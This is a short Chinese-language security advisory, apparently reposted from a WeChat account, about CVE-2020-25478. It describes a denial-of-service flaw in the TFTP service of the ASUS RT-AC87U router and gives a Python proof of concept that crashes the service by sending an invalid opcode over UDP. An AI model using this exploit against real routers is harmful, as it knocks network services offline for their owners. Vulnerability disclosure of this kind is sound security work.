ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack
CVE-2020-25478 – ASUS RT-AC87U TFTP 易受拒绝服务 (DoS) 攻击
受影响产品的名称和版本
华硕 RT-AC87U 3.0.0.4.382_51640
问题类型
它主要与 CWE-20 相关,在华硕 RT-AC87U 中运行的 TFTP 服务在向服务发送无效操作码时容易受到拒绝服务 (DoS) 攻击。以下python代码段用于测试漏洞:
import socketimport systftpd = ('192.168.1.1', 69)#Try and open an UDP SOCKETtry:tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)except:print("Failed on socket creation, so exiting")sys.exit(1)#create a invalid opcode exeeding the 2 byte length# opcode operation# 1 Read request (RRQ)# 2 Write request (WRQ)# 3 Data (DATA)# 4 Acknowledgment (ACK)# 5 Error (ERROR)invalidOpcode = "0000"tftp.sendto(invalidOpcode,tftpd)
描述
Asus RT-AC87U 版本 3.0.0.4.382_51640 容易受到对 TFTP 服务的拒绝服务攻击导致 TFTP 服务崩溃。TFTP 服务很容易通过发送无效的操作码远程崩溃。
原文始发于微信公众号(Ots安全):华硕 RT-AC87U TFTP 易受拒绝服务 (DoS) 攻击
